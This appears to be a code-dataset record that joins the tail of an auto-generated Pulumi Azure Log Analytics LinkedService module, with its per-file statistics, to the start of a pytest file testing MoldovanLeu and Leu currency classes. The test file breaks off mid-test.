warnings.warn("""This field has been deprecated in favour of `workspace_id` and will be removed in a future version of the provider""", DeprecationWarning)
pulumi.log.warn("""workspace_name is deprecated: This field has been deprecated in favour of `workspace_id` and will be removed in a future version of the provider""")
if workspace_name is not None:
pulumi.set(__self__, "workspace_name", workspace_name)
if write_access_id is not None:
pulumi.set(__self__, "write_access_id", write_access_id)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group in which the Log Analytics Linked Service is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the type of linkedServices resource to connect to the Log Analytics Workspace specified in workspace_name. Accepted values are `automation` and `cluster`. Defaults to `automation`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter(name="readAccessId")
def read_access_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the readable Resource that will be linked to the workspace. This should be used for linking to an Automation Account resource.
"""
return pulumi.get(self, "read_access_id")
@read_access_id.setter
def read_access_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "read_access_id", value)
@property
@pulumi.getter(name="resourceId")
def resource_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Resource that will be linked to the workspace. This should be used for linking to an Automation Account resource.
"""
return pulumi.get(self, "resource_id")
@resource_id.setter
def resource_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_id", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="workspaceId")
def workspace_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Log Analytics Workspace that will contain the Log Analytics Linked Service resource. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "workspace_id")
@workspace_id.setter
def workspace_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "workspace_id", value)
@property
@pulumi.getter(name="workspaceName")
def workspace_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Log Analytics Workspace that will contain the Log Analytics Linked Service resource. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "workspace_name")
@workspace_name.setter
def workspace_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "workspace_name", value)
@property
@pulumi.getter(name="writeAccessId")
def write_access_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the writable Resource that will be linked to the workspace. This should be used for linking to a Log Analytics Cluster resource.
"""
return pulumi.get(self, "write_access_id")
@write_access_id.setter
def write_access_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "write_access_id", value)
@pulumi.input_type
class _LinkedServiceState:
def __init__(__self__, *,
linked_service_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
read_access_id: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
resource_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
workspace_id: Optional[pulumi.Input[str]] = None,
workspace_name: Optional[pulumi.Input[str]] = None,
write_access_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering LinkedService resources.
:param pulumi.Input[str] linked_service_name: Name of the type of linkedServices resource to connect to the Log Analytics Workspace specified in workspace_name. Accepted values are `automation` and `cluster`. Defaults to `automation`. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: The generated name of the Linked Service. The format for this attribute is always `<workspace name>/<linked service type>`(e.g. `workspace1/Automation` or `workspace1/Cluster`)
:param pulumi.Input[str] read_access_id: The ID of the readable Resource that will be linked to the workspace. This should be used for linking to an Automation Account resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Log Analytics Linked Service is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_id: The ID of the Resource that will be linked to the workspace. This should be used for linking to an Automation Account resource.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[str] workspace_id: The ID of the Log Analytics Workspace that will contain the Log Analytics Linked Service resource. Changing this forces a new resource to be created.
:param pulumi.Input[str] workspace_name: The name of the Log Analytics Workspace that will contain the Log Analytics Linked Service resource. Changing this forces a new resource to be created.
:param pulumi.Input[str] write_access_id: The ID of the writable Resource that will be linked to the workspace. This should be used for linking to a Log Analytics Cluster resource.
"""
if linked_service_name is not None:
warnings.warn("""This field has been deprecated and will be removed in a future version of the provider""", DeprecationWarning)
pulumi.log.warn("""linked_service_name is deprecated: This field has been deprecated and will be removed in a future version of the provider""")
if linked_service_name is not None:
pulumi.set(__self__, "linked_service_name", linked_service_name)
if name is not None:
pulumi.set(__self__, "name", name)
if read_access_id is not None:
pulumi.set(__self__, "read_access_id", read_access_id)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if resource_id is not None:
warnings.warn("""This field has been deprecated in favour of `read_access_id` and will be removed in a future version of the provider""", DeprecationWarning)
pulumi.log.warn("""resource_id is deprecated: This field has been deprecated in favour of `read_access_id` and will be removed in a future version of the provider""")
if resource_id is not None:
pulumi.set(__self__, "resource_id", resource_id)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if workspace_id is not None:
pulumi.set(__self__, "workspace_id", workspace_id)
if workspace_name is not None:
warnings.warn("""This field has been deprecated in favour of `workspace_id` and will be removed in a future version of the provider""", DeprecationWarning)
pulumi.log.warn("""workspace_name is deprecated: This field has been deprecated in favour of `workspace_id` and will be removed in a future version of the provider""")
if workspace_name is not None:
pulumi.set(__self__, "workspace_name", workspace_name)
if write_access_id is not None:
pulumi.set(__self__, "write_access_id", write_access_id)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the type of linkedServices resource to connect to the Log Analytics Workspace specified in workspace_name. Accepted values are `automation` and `cluster`. Defaults to `automation`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The generated name of the Linked Service. The format for this attribute is always `<workspace name>/<linked service type>`(e.g. `workspace1/Automation` or `workspace1/Cluster`)
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="readAccessId")
def read_access_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the readable Resource that will be linked to the workspace. This should be used for linking to an Automation Account resource.
"""
return pulumi.get(self, "read_access_id")
@read_access_id.setter
def read_access_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "read_access_id", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource group in which the Log Analytics Linked Service is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="resourceId")
def resource_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Resource that will be linked to the workspace. This should be used for linking to an Automation Account resource.
"""
return pulumi.get(self, "resource_id")
@resource_id.setter
def resource_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_id", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="workspaceId")
def workspace_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Log Analytics Workspace that will contain the Log Analytics Linked Service resource. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "workspace_id")
@workspace_id.setter
def workspace_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "workspace_id", value)
@property
@pulumi.getter(name="workspaceName")
def workspace_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Log Analytics Workspace that will contain the Log Analytics Linked Service resource. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "workspace_name")
@workspace_name.setter
def workspace_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "workspace_name", value)
@property
@pulumi.getter(name="writeAccessId")
def write_access_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the writable Resource that will be linked to the workspace. This should be used for linking to a Log Analytics Cluster resource.
"""
return pulumi.get(self, "write_access_id")
@write_access_id.setter
def write_access_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "write_access_id", value)
class LinkedService(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
linked_service_name: Optional[pulumi.Input[str]] = None,
read_access_id: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
resource_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
workspace_id: Optional[pulumi.Input[str]] = None,
workspace_name: Optional[pulumi.Input[str]] = None,
write_access_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages a Log Analytics Linked Service.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_account = azure.automation.Account("exampleAccount",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
sku_name="Basic",
tags={
"environment": "development",
})
example_analytics_workspace = azure.operationalinsights.AnalyticsWorkspace("exampleAnalyticsWorkspace",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
sku="PerGB2018",
retention_in_days=30)
example_linked_service = azure.loganalytics.LinkedService("exampleLinkedService",
resource_group_name=example_resource_group.name,
workspace_id=example_analytics_workspace.id,
read_access_id=example_account.id)
```
## Import
Log Analytics Workspaces can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:loganalytics/linkedService:LinkedService example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/Microsoft.OperationalInsights/workspaces/workspace1/linkedServices/Automation
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] linked_service_name: Name of the type of linkedServices resource to connect to the Log Analytics Workspace specified in workspace_name. Accepted values are `automation` and `cluster`. Defaults to `automation`. Changing this forces a new resource to be created.
:param pulumi.Input[str] read_access_id: The ID of the readable Resource that will be linked to the workspace. This should be used for linking to an Automation Account resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Log Analytics Linked Service is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_id: The ID of the Resource that will be linked to the workspace. This should be used for linking to an Automation Account resource.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[str] workspace_id: The ID of the Log Analytics Workspace that will contain the Log Analytics Linked Service resource. Changing this forces a new resource to be created.
:param pulumi.Input[str] workspace_name: The name of the Log Analytics Workspace that will contain the Log Analytics Linked Service resource. Changing this forces a new resource to be created.
:param pulumi.Input[str] write_access_id: The ID of the writable Resource that will be linked to the workspace. This should be used for linking to a Log Analytics Cluster resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: LinkedServiceArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a Log Analytics Linked Service.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_account = azure.automation.Account("exampleAccount",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
sku_name="Basic",
tags={
"environment": "development",
})
example_analytics_workspace = azure.operationalinsights.AnalyticsWorkspace("exampleAnalyticsWorkspace",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
sku="PerGB2018",
retention_in_days=30)
example_linked_service = azure.loganalytics.LinkedService("exampleLinkedService",
resource_group_name=example_resource_group.name,
workspace_id=example_analytics_workspace.id,
read_access_id=example_account.id)
```
## Import
Log Analytics Workspaces can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:loganalytics/linkedService:LinkedService example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/Microsoft.OperationalInsights/workspaces/workspace1/linkedServices/Automation
```
:param str resource_name: The name of the resource.
:param LinkedServiceArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(LinkedServiceArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
linked_service_name: Optional[pulumi.Input[str]] = None,
read_access_id: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
resource_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
workspace_id: Optional[pulumi.Input[str]] = None,
workspace_name: Optional[pulumi.Input[str]] = None,
write_access_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = LinkedServiceArgs.__new__(LinkedServiceArgs)
if linked_service_name is not None and not opts.urn:
warnings.warn("""This field has been deprecated and will be removed in a future version of the provider""", DeprecationWarning)
pulumi.log.warn("""linked_service_name is deprecated: This field has been deprecated and will be removed in a future version of the provider""")
__props__.__dict__["linked_service_name"] = linked_service_name
__props__.__dict__["read_access_id"] = read_access_id
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if resource_id is not None and not opts.urn:
warnings.warn("""This field has been deprecated in favour of `read_access_id` and will be removed in a future version of the provider""", DeprecationWarning)
pulumi.log.warn("""resource_id is deprecated: This field has been deprecated in favour of `read_access_id` and will be removed in a future version of the provider""")
__props__.__dict__["resource_id"] = resource_id
__props__.__dict__["tags"] = tags
__props__.__dict__["workspace_id"] = workspace_id
if workspace_name is not None and not opts.urn:
warnings.warn("""This field has been deprecated in favour of `workspace_id` and will be removed in a future version of the provider""", DeprecationWarning)
pulumi.log.warn("""workspace_name is deprecated: This field has been deprecated in favour of `workspace_id` and will be removed in a future version of the provider""")
__props__.__dict__["workspace_name"] = workspace_name
__props__.__dict__["write_access_id"] = write_access_id
__props__.__dict__["name"] = None
super(LinkedService, __self__).__init__(
'azure:loganalytics/linkedService:LinkedService',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
linked_service_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
read_access_id: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
resource_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
workspace_id: Optional[pulumi.Input[str]] = None,
workspace_name: Optional[pulumi.Input[str]] = None,
write_access_id: Optional[pulumi.Input[str]] = None) -> 'LinkedService':
"""
Get an existing LinkedService resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] linked_service_name: Name of the type of linkedServices resource to connect to the Log Analytics Workspace specified in workspace_name. Accepted values are `automation` and `cluster`. Defaults to `automation`. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: The generated name of the Linked Service. The format for this attribute is always `<workspace name>/<linked service type>`(e.g. `workspace1/Automation` or `workspace1/Cluster`)
:param pulumi.Input[str] read_access_id: The ID of the readable Resource that will be linked to the workspace. This should be used for linking to an Automation Account resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Log Analytics Linked Service is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_id: The ID of the Resource that will be linked to the workspace. This should be used for linking to an Automation Account resource.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[str] workspace_id: The ID of the Log Analytics Workspace that will contain the Log Analytics Linked Service resource. Changing this forces a new resource to be created.
:param pulumi.Input[str] workspace_name: The name of the Log Analytics Workspace that will contain the Log Analytics Linked Service resource. Changing this forces a new resource to be created.
:param pulumi.Input[str] write_access_id: The ID of the writable Resource that will be linked to the workspace. This should be used for linking to a Log Analytics Cluster resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _LinkedServiceState.__new__(_LinkedServiceState)
__props__.__dict__["linked_service_name"] = linked_service_name
__props__.__dict__["name"] = name
__props__.__dict__["read_access_id"] = read_access_id
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["resource_id"] = resource_id
__props__.__dict__["tags"] = tags
__props__.__dict__["workspace_id"] = workspace_id
__props__.__dict__["workspace_name"] = workspace_name
__props__.__dict__["write_access_id"] = write_access_id
return LinkedService(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Output[str]:
"""
Name of the type of linkedServices resource to connect to the Log Analytics Workspace specified in workspace_name. Accepted values are `automation` and `cluster`. Defaults to `automation`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "linked_service_name")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The generated name of the Linked Service. The format for this attribute is always `<workspace name>/<linked service type>`(e.g. `workspace1/Automation` or `workspace1/Cluster`)
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="readAccessId")
def read_access_id(self) -> pulumi.Output[str]:
"""
The ID of the readable Resource that will be linked to the workspace. This should be used for linking to an Automation Account resource.
"""
return pulumi.get(self, "read_access_id")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the resource group in which the Log Analytics Linked Service is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter(name="resourceId")
def resource_id(self) -> pulumi.Output[str]:
"""
The ID of the Resource that will be linked to the workspace. This should be used for linking to an Automation Account resource.
"""
return pulumi.get(self, "resource_id")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="workspaceId")
def workspace_id(self) -> pulumi.Output[str]:
"""
The ID of the Log Analytics Workspace that will contain the Log Analytics Linked Service resource. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "workspace_id")
@property
@pulumi.getter(name="workspaceName")
def workspace_name(self) -> pulumi.Output[str]:
"""
The name of the Log Analytics Workspace that will contain the Log Analytics Linked Service resource. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "workspace_name")
@property
@pulumi.getter(name="writeAccessId")
def write_access_id(self) -> pulumi.Output[Optional[str]]:
"""
The ID of the writable Resource that will be linked to the workspace. This should be used for linking to a Log Analytics Cluster resource.
"""
return pulumi.get(self, "write_access_id")
| 56.325543
| 293
| 0.686327
| 4,371
| 33,739
| 5.111187
| 0.049188
| 0.062531
| 0.070185
| 0.063023
| 0.922251
| 0.914194
| 0.909359
| 0.902466
| 0.897856
| 0.886576
| 0
| 0.003418
| 0.228282
| 33,739
| 598
| 294
| 56.419732
| 0.85463
| 0.401909
| 0
| 0.796407
| 1
| 0.035928
| 0.20015
| 0.003586
| 0
| 0
| 0
| 0
| 0
| 1
| 0.149701
| false
| 0.002994
| 0.01497
| 0
| 0.254491
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4aebde625d398be9bb422562d27de505cb67b625
| 15,872
|
py
|
Python
|
tests/test_leu.py
|
fscm/multicurrency
|
5eabdcbfbf427dcafe08d4d05cfce8c9348aeb91
|
[
"MIT"
] | 2
|
2021-03-26T18:19:57.000Z
|
2021-07-27T01:15:50.000Z
|
tests/test_leu.py
|
fscm/multicurrency
|
5eabdcbfbf427dcafe08d4d05cfce8c9348aeb91
|
[
"MIT"
] | null | null | null |
tests/test_leu.py
|
fscm/multicurrency
|
5eabdcbfbf427dcafe08d4d05cfce8c9348aeb91
|
[
"MIT"
] | null | null | null |
# -*- coding: UTF-8 -*-
#
# copyright: 2020-2022, Frederico Martins
# author: Frederico Martins <http://github.com/fscm>
# license: SPDX-License-Identifier: MIT
"""Tests for the Leu currency representation(s)."""
from decimal import Context
from pytest import raises
from multicurrency import Currency
from multicurrency import (
CurrencyMismatchException,
CurrencyTypeException)
CONTEXT = Context(prec=28, rounding='ROUND_HALF_EVEN').copy()
"""Tests for the Moldovan Leu representation."""
from multicurrency import MoldovanLeu
class TestMoldovanLeu:
"""MoldovanLeu currency tests."""
def test_moldovan_leu(self):
"""test_moldovan_leu."""
amount = CONTEXT.create_decimal(1) / CONTEXT.create_decimal(7)
moldovan_leu = MoldovanLeu(amount=amount)
decimal = CONTEXT.create_decimal(amount)
assert moldovan_leu.amount == decimal
assert moldovan_leu.numeric_code == '498'
assert moldovan_leu.alpha_code == 'MDL'
assert moldovan_leu.decimal_places == 2
assert moldovan_leu.decimal_sign == ','
assert moldovan_leu.grouping_places == 3
assert moldovan_leu.grouping_sign == '.'
assert not moldovan_leu.international
assert moldovan_leu.symbol == 'L'
assert not moldovan_leu.symbol_ahead
assert moldovan_leu.symbol_separator == '\u00A0'
assert moldovan_leu.localized_symbol == 'L'
assert moldovan_leu.convertion == ''
assert moldovan_leu.__hash__() == hash(
(moldovan_leu.__class__, decimal, 'MDL', '498'))
assert moldovan_leu.__repr__() == (
'MoldovanLeu(amount: 0.1428571428571428571428571429, '
'alpha_code: "MDL", '
'symbol: "L", '
'symbol_ahead: False, '
'symbol_separator: "\u00A0", '
'localized_symbol: "L", '
'numeric_code: "498", '
'decimal_places: "2", '
'decimal_sign: ",", '
'grouping_places: "3", '
'grouping_sign: ".", '
'convertion: "", '
'international: False)')
assert moldovan_leu.__str__() == '0,14 L'
def test_moldovan_leu_negative(self):
"""test_moldovan_leu_negative."""
amount = -100
moldovan_leu = MoldovanLeu(amount=amount)
decimal = CONTEXT.create_decimal(amount)
assert moldovan_leu.numeric_code == '498'
assert moldovan_leu.alpha_code == 'MDL'
assert moldovan_leu.decimal_places == 2
assert moldovan_leu.decimal_sign == ','
assert moldovan_leu.grouping_places == 3
assert moldovan_leu.grouping_sign == '.'
assert not moldovan_leu.international
assert moldovan_leu.symbol == 'L'
assert not moldovan_leu.symbol_ahead
assert moldovan_leu.symbol_separator == '\u00A0'
assert moldovan_leu.localized_symbol == 'L'
assert moldovan_leu.convertion == ''
assert moldovan_leu.__hash__() == hash(
(moldovan_leu.__class__, decimal, 'MDL', '498'))
assert moldovan_leu.__repr__() == (
'MoldovanLeu(amount: -100, '
'alpha_code: "MDL", '
'symbol: "L", '
'symbol_ahead: False, '
'symbol_separator: "\u00A0", '
'localized_symbol: "L", '
'numeric_code: "498", '
'decimal_places: "2", '
'decimal_sign: ",", '
'grouping_places: "3", '
'grouping_sign: ".", '
'convertion: "", '
'international: False)')
assert moldovan_leu.__str__() == '-100,00 L'
def test_moldovan_leu_custom(self):
"""test_moldovan_leu_custom."""
amount = 1000
moldovan_leu = MoldovanLeu(
amount=amount,
decimal_places=5,
decimal_sign='.',
grouping_places=2,
grouping_sign=',',
international=True,
symbol_ahead=False,
symbol_separator='_')
decimal = CONTEXT.create_decimal(amount)
assert moldovan_leu.amount == decimal
assert moldovan_leu.numeric_code == '498'
assert moldovan_leu.alpha_code == 'MDL'
assert moldovan_leu.decimal_places == 5
assert moldovan_leu.decimal_sign == '.'
assert moldovan_leu.grouping_places == 2
assert moldovan_leu.grouping_sign == ','
assert moldovan_leu.international
assert moldovan_leu.symbol == 'L'
assert not moldovan_leu.symbol_ahead
assert moldovan_leu.symbol_separator == '_'
assert moldovan_leu.localized_symbol == 'L'
assert moldovan_leu.convertion == ''
assert moldovan_leu.__hash__() == hash(
(moldovan_leu.__class__, decimal, 'MDL', '498'))
assert moldovan_leu.__repr__() == (
'MoldovanLeu(amount: 1000, '
'alpha_code: "MDL", '
'symbol: "L", '
'symbol_ahead: False, '
'symbol_separator: "_", '
'localized_symbol: "L", '
'numeric_code: "498", '
'decimal_places: "5", '
'decimal_sign: ".", '
'grouping_places: "2", '
'grouping_sign: ",", '
'convertion: "", '
'international: True)')
assert moldovan_leu.__str__() == 'MDL 10,00.00000'
def test_moldovan_leu_changed(self):
"""test_cmoldovan_leu_changed."""
moldovan_leu = MoldovanLeu(amount=1000)
with raises(
AttributeError,
match='can\'t set attribute'):
moldovan_leu.amount = 999
with raises(
AttributeError,
match='can\'t set attribute'):
moldovan_leu.alpha_code = 'EUR'
with raises(
AttributeError,
match='can\'t set attribute'):
moldovan_leu.convertion = '0123456789,.'
with raises(
AttributeError,
match='can\'t set attribute'):
moldovan_leu.symbol = '€'
with raises(
AttributeError,
match='can\'t set attribute'):
moldovan_leu.symbol_ahead = False
with raises(
AttributeError,
match='can\'t set attribute'):
moldovan_leu.symbol_separator = '_'
with raises(
AttributeError,
match='can\'t set attribute'):
moldovan_leu.localized_symbol = '€'
with raises(
AttributeError,
match='can\'t set attribute'):
moldovan_leu.numeric_code = '978'
with raises(
AttributeError,
match='can\'t set attribute'):
moldovan_leu.decimal_places = 3
with raises(
AttributeError,
match='can\'t set attribute'):
moldovan_leu.decimal_sign = ','
with raises(
AttributeError,
match='can\'t set attribute'):
moldovan_leu.grouping_places = 4
with raises(
AttributeError,
match='can\'t set attribute'):
moldovan_leu.grouping_sign = '.'
with raises(
AttributeError,
match='can\'t set attribute'):
moldovan_leu.international = True
def test_moldovan_leu_math_add(self):
"""test_moldovan_leu_math_add."""
moldovan_leu_one = MoldovanLeu(amount=1)
moldovan_leu_two = MoldovanLeu(amount=2)
moldovan_leu_three = MoldovanLeu(amount=3)
currency = Currency(amount=1, alpha_code='OTHER')
with raises(
CurrencyMismatchException,
match='unsupported operation between currency MDL and OTHER.'):
_ = moldovan_leu_one + currency
with raises(
CurrencyTypeException,
match=(
'unsupported operation between <class \'multicurrency.'
'leu.MoldovanLeu\'> '
'and <class \'str\'>.')):
_ = moldovan_leu_one.__add__('1.00')
assert (
moldovan_leu_one +
moldovan_leu_two) == moldovan_leu_three
def test_moldovan_leu_slots(self):
"""test_moldovan_leu_slots."""
moldovan_leu = MoldovanLeu(amount=1000)
with raises(
AttributeError,
match=(
'\'MoldovanLeu\' '
'object has no attribute \'new_variable\'')):
moldovan_leu.new_variable = 'fail' # pylint: disable=assigning-non-slot
"""Tests for the Leu representation."""
from multicurrency import Leu
class TestLeu:
"""Leu currency tests."""
def test_leu(self):
"""test_leu."""
amount = CONTEXT.create_decimal(1) / CONTEXT.create_decimal(7)
leu = Leu(amount=amount)
decimal = CONTEXT.create_decimal(amount)
assert leu.amount == decimal
assert leu.numeric_code == '946'
assert leu.alpha_code == 'RON'
assert leu.decimal_places == 2
assert leu.decimal_sign == ','
assert leu.grouping_places == 3
assert leu.grouping_sign == '.'
assert not leu.international
assert leu.symbol == 'L'
assert not leu.symbol_ahead
assert leu.symbol_separator == '\u00A0'
assert leu.localized_symbol == 'L'
assert leu.convertion == ''
assert leu.__hash__() == hash(
(leu.__class__, decimal, 'RON', '946'))
assert leu.__repr__() == (
'Leu(amount: 0.1428571428571428571428571429, '
'alpha_code: "RON", '
'symbol: "L", '
'symbol_ahead: False, '
'symbol_separator: "\u00A0", '
'localized_symbol: "L", '
'numeric_code: "946", '
'decimal_places: "2", '
'decimal_sign: ",", '
'grouping_places: "3", '
'grouping_sign: ".", '
'convertion: "", '
'international: False)')
assert leu.__str__() == '0,14 L'
def test_leu_negative(self):
"""test_leu_negative."""
amount = -100
leu = Leu(amount=amount)
decimal = CONTEXT.create_decimal(amount)
assert leu.numeric_code == '946'
assert leu.alpha_code == 'RON'
assert leu.decimal_places == 2
assert leu.decimal_sign == ','
assert leu.grouping_places == 3
assert leu.grouping_sign == '.'
assert not leu.international
assert leu.symbol == 'L'
assert not leu.symbol_ahead
assert leu.symbol_separator == '\u00A0'
assert leu.localized_symbol == 'L'
assert leu.convertion == ''
assert leu.__hash__() == hash(
(leu.__class__, decimal, 'RON', '946'))
assert leu.__repr__() == (
'Leu(amount: -100, '
